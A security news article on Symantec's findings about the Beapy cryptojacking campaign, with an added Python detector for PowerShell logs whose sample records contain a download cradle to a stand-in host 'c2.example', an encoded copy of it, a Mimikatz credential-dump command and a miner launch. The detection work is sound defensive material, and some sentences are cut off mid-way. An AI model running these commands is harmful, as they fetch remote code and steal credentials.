Security experts at Symantec have uncovered a new
“Beapy is a cryptojacking campaign impacting enterprises that uses the EternalBlue exploit and stolen and hardcoded credentials to spread rapidly across networks.” reads the analysis published by Symantec.
The DOUBLEPULSAR backdoor allows attackers to inject and execute malicious code on a target system. It is installed by leveraging ETERNALBLUE, an SMBv1 (Server Message Block 1.0) exploit that can trigger remote code execution (RCE) in older versions of Windows (Windows XP to Server 2008 R2).
Every Windows machine running an old, vulnerable version that exposes an SMB service is at risk of compromise. DOUBLEPULSAR and ETERNALBLUE have been available to anyone since the archive of NSA tools was leaked online by the Shadow Brokers hacker group.
Most of the victims are located in China (80%), with the remainder in South Korea, Japan, and Vietnam.
The experts first observed the campaign in January; almost all victims (98%) are enterprises.
Once the backdoor is installed, a PowerShell command allows the malware to connect to the command and control server. The malicious code executes further PowerShell scripts before the cryptocurrency miner is downloaded.
Experts reported that the Beapy malware also uses the popular post-exploitation tool Mimikatz to steal passwords from Windows systems.
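The chain described above (a PowerShell stage reaching out to the command and control server, further scripts being pulled down, Mimikatz being run for credential theft, and finally a coinminer being dropped) leaves a recognisable trail in PowerShell script-block logging. The following is an added example, not code from Symantec's analysis or from the Beapy sample: it scans constructed script-block log records (the shape of Windows event 4104 exports) and tags each record with the stage of the chain it resembles, then reports hosts on which several stages appear together. The log lines, host names, URLs and the indicator strings are all assumptions made for the example, not signatures taken from the campaign.

```python
"""Stage-tagging detector for PowerShell script-block logs (added example).

Every log line, host name and indicator below is constructed for illustration;
none of it comes from the Beapy campaign or Symantec's report.
"""
import base64
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import List, Optional

# Hypothetical stage-2 command, encoded the way PowerShell's -EncodedCommand
# expects (base64 over UTF-16LE). Built here rather than pasted to avoid typos.
_STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://c2.example/stage2.ps1')"
_ENCODED = base64.b64encode(_STAGE2.encode("utf-16-le")).decode("ascii")

# Constructed sample: "<timestamp> <host> <script block text>", one record per line.
SAMPLE_LOG = "\n".join([
    "2019-03-02T10:14:07Z WS-017 Get-ChildItem C:\\Users\\alice\\Documents",
    f"2019-03-02T10:15:41Z WS-017 powershell -nop -w hidden -EncodedCommand {_ENCODED}",
    "2019-03-02T10:16:03Z WS-017 IEX (New-Object Net.WebClient).DownloadString('http://c2.example/mimi.ps1'); Invoke-Mimikatz -Command 'sekurlsa::logonpasswords'",
    "2019-03-02T10:17:22Z WS-017 Start-Process C:\\ProgramData\\svc\\miner.exe -ArgumentList '-o stratum+tcp://pool.example:3333'",
    "2019-03-02T10:20:00Z WS-022 Get-Service | Where-Object Status -eq 'Running'",
])

# Illustrative indicators (assumptions, not Beapy signatures), grouped by the
# stage of the chain they point to. Order matters: it is the order tags are emitted.
STAGE_PATTERNS = {
    "c2_download": re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient", re.I),
    "credential_theft": re.compile(r"Invoke-Mimikatz|sekurlsa::|mimikatz", re.I),
    "coinminer": re.compile(r"stratum\+tcp://|cryptonight|monero", re.I),
}
# -e / -enc / -EncodedCommand followed by a base64 blob.
ENCODED_CMD = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})", re.I)
LINE = re.compile(r"^(\S+)\s+(\S+)\s+(.*)$")


@dataclass
class Finding:
    timestamp: str
    host: str
    stages: List[str]
    text: str


def decode_encoded_command(text: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload, or None if there is none."""
    m = ENCODED_CMD.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="ignore")
    except ValueError:  # binascii.Error is a ValueError subclass
        return None


def classify(text: str) -> List[str]:
    """Tag one script block with the chain stages it resembles."""
    stages = []
    decoded = decode_encoded_command(text)
    if decoded:
        stages.append("encoded_command")
    # Inspect the decoded payload as well, so an encoded download cradle is not missed.
    haystack = text + ("\n" + decoded if decoded else "")
    for stage, pattern in STAGE_PATTERNS.items():
        if pattern.search(haystack):
            stages.append(stage)
    return stages


def scan(log_text: str) -> List[Finding]:
    """Parse the log and keep only records that match at least one stage."""
    findings = []
    for raw in log_text.splitlines():
        m = LINE.match(raw)
        if not m:
            continue
        timestamp, host, text = m.groups()
        stages = classify(text)
        if stages:
            findings.append(Finding(timestamp, host, stages, text))
    return findings


def hosts_with_chain(findings: List[Finding], min_stages: int = 2) -> dict:
    """Hosts on which at least min_stages distinct stages were seen, i.e. a likely chain."""
    seen = defaultdict(set)
    for f in findings:
        seen[f.host].update(f.stages)
    return {host: sorted(stages) for host, stages in seen.items() if len(stages) >= min_stages}


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for f in found:
        print(f.timestamp, f.host, ",".join(f.stages))
    print("hosts showing a multi-stage chain:", hosts_with_chain(found))
```

A single tag such as `c2_download` is noisy on its own (administrators use `Invoke-WebRequest` too); the useful signal is the combination on one host within a short window, which is what `hosts_with_chain` surfaces. In a real deployment the records would be exported from the Microsoft-Windows-PowerShell/Operational log rather than embedded as they are here.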
Experts at Symantec also discovered an earlier version of the Beapy malware that had compromised a public-facing web server and was attempting to spread to connected systems.
Coded in C rather than Python, this version also includes both EternalBlue and Mimikatz.
The malicious code also leverages other exploits for known vulnerabilities in Apache Struts, Apache Tomcat, and Oracle WebLogic Server.
“In the web server compromise,
Experts observed a spike in the activity of Beapy in March:
Since the Coinhive cryptocurrency mining service shut down in March, experts have observed a drop in cryptojacking attacks.
Unlike Coinhive, Beapy is a file-based miner that must be installed by attackers on the victims’ machines in order to mine cryptocurrency.
“As well as these factors, file-based coinminers also have a significant advantage over browser-based coinminers because they can mine cryptocurrency faster.” states Symantec, “The Monero cryptocurrency, which is the cryptocurrency most commonly mined during cryptojacking attacks, dropped in value by 90 percent in 2018, so it may make sense that miners that can create more cryptocurrency faster are now more popular with cyber criminals.”
The Beapy campaign was also spotted by other security firms, including Qihoo 360’s research team and Trend Micro.
(SecurityAffairs – Beapy miner, hacking)